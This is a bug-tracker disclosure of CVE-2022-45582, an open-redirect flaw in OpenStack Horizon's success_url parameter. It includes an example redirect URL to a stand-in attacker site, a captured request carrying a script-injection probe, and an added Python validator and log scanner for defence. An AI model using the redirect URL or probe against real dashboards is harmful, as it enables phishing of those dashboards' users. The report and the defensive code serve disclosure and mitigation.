CVE-2022-45582: Bug #1982676 “Open redirect / phishing attack via “success_url” ...” : Bugs : OpenStack Dashboard (Horizon)

Open Redirect vulnerability in Horizon Web Dashboard 19.4.0 thru 20.1.4 via the success_url parameter.


The “success_url” parameter is used when updating a project snapshot, and the URL it carries is not validated, which allows an attacker to redirect the user to another website.

For instance, the URL below will redirect you to https://hacker.com:

https://xxx.com/project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https://hacker.com

The attacker can send this link to the user, and when the user clicks the “Update” button, the request and response look like this:

[+] Request

POST /project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https%3A%2F%2Fhacker.coom HTTP/1.1
Host: xxx.com
Cookie: _ga_0CPB5J3KQB=GS1.1.1656302247.2.0.1656302247.0; _ga=GA1.1.2043123211.1656300031; login_region=default; login_domain=""; theme=default; sessionid=yl7fjfh7dhpwduodbxb4mjxng46qowgh; csrftoken=j5WQq7woP7OJGKnbTAa6cbQ8zyEgUhWjIZRu4vDMNgbFbNIl5bAe7V2PESYSbUYI; recent_project=dfcf9f80229f400a9e7ac53782be9e39
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
<====================>SNIP<====================>

csrfmiddlewaretoken=9wp8nOC21UvAGFxqG0qa1DjRsdKg26P0yqkM1cJqZ3SwbISASBQiWnvyxx4SjJRp&name=snapshot+for+%3Cscript%3Ealert%281%29%3C%2Fscript%3E+%22+%27%5Cu0022%C3%A2%5Cx04&description=

[+] Response

HTTP/1.1 302 Found
date: Tue, 12 Jul 2022 10:14:38 GMT
server: Apache/2.4.41 (Ubuntu)
location: https://hacker.com
content-length: 0
x-horizon-location: https://hacker.com
x-frame-options: SAMEORIGIN
vary: Accept-Language,Cookie
content-language: en
<====================>SNIP<====================>

Impact: The attacker can redirect users to a cloned website to steal information, a so-called phishing attack.

CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)
http://cwe.mitre.org/data/definitions/601.html

I have tested it on OpenStack Xena, so the Horizon dashboard could be between versions 20.0.0 and 20.1.2. I haven’t tested the bug on other versions.
Unfortunately, I discovered this bug while pen-testing a black-box project, so I do not have the log file. I hope my information helps you understand the bug.
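The root cause described above is a redirect target taken from the request without being checked against the application's own host. As an added example (not Horizon's code and not the fix the project shipped), the block below shows the validation a Django-style dashboard needs before honouring a `success_url` value, and then runs the same check over a few constructed access-log lines to flag requests that carried an off-site target. The allowed host `xxx.com`, the default landing path and the log lines are all assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hosts the dashboard may redirect to. Constructed for this example; a real
# deployment would use its own configured hostname(s).
ALLOWED_HOSTS = {"xxx.com"}
ALLOWED_SCHEMES = {"http", "https"}
# Assumed fallback page used when success_url is missing or unsafe.
DEFAULT_URL = "/project/snapshots/"


def is_safe_redirect(url, allowed_hosts=ALLOWED_HOSTS, require_https=False):
    """Return True only if url is a same-site absolute path or an http(s) URL
    whose host is in allowed_hosts. Everything else is treated as off-site."""
    if not url:
        return False
    url = url.strip()
    # Control characters and backslashes are rejected outright: some browsers
    # normalise "\" to "/", turning "/\evil" into a scheme-relative URL.
    if any(c in url for c in "\r\n\t\\"):
        return False
    # Scheme-relative URLs ("//host/...") point at a foreign host.
    if url.startswith("//"):
        return False
    parts = urlsplit(url)
    if parts.scheme and parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False  # e.g. javascript: or data:
    if not parts.netloc:
        # No host given: accept only an absolute path on this site.
        return not parts.scheme and url.startswith("/")
    # urlsplit already strips userinfo ("user@host") when reporting hostname,
    # so "https://xxx.com@hacker.com/" is judged by hacker.com, not xxx.com.
    host = (parts.hostname or "").lower()
    if host not in {h.lower() for h in allowed_hosts}:
        return False
    if require_https and parts.scheme.lower() != "https":
        return False
    return True


def resolve_success_url(success_url, default=DEFAULT_URL):
    """Return success_url if it passes validation, otherwise the safe default."""
    return success_url if is_safe_redirect(success_url) else default


# --- detection over web-server logs ---------------------------------------

# Matches the request target in a common/combined-format access log line.
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def find_suspicious_redirects(log_lines):
    """Return the decoded success_url values that fail validation."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes, so "https%3A%2F%2F..." becomes "https://..."
        for target in parse_qs(query).get("success_url", []):
            if not is_safe_redirect(target):
                hits.append(target)
    return hits


# Constructed sample log lines modelled on the request shown in the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jul/2022:10:14:38 +0000] "POST /project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https%3A%2F%2Fhacker.com HTTP/1.1" 302 0',
    '203.0.113.6 - - [12/Jul/2022:10:15:02 +0000] "POST /project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=%2Fproject%2Fsnapshots%2F HTTP/1.1" 302 0',
    '203.0.113.7 - - [12/Jul/2022:10:15:40 +0000] "GET /project/snapshots/ HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print(resolve_success_url("https://hacker.com"))          # falls back to default
    print(resolve_success_url("/project/snapshots/"))         # kept
    print(find_suspicious_redirects(SAMPLE_LOG))              # ['https://hacker.com']
```

In a real Django application (Horizon is built on Django) the equivalent check is `django.utils.http.url_has_allowed_host_and_scheme(url, allowed_hosts, require_https=False)`; the hand-written version here only exists so the example runs without Django installed and makes the individual rejection rules visible. The log scan is a cheap retrospective check for a dashboard that was exposed before patching: any flagged `success_url` is a request that would have produced the 302 shown in the report.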

Related news

GHSA-5pv6-rprw-82wv: Horizon Web Dashboard Open Redirect vulnerability

Open Redirect vulnerability in Horizon Web Dashboard 19.4.0 thru 20.1.4 via the success_url parameter.
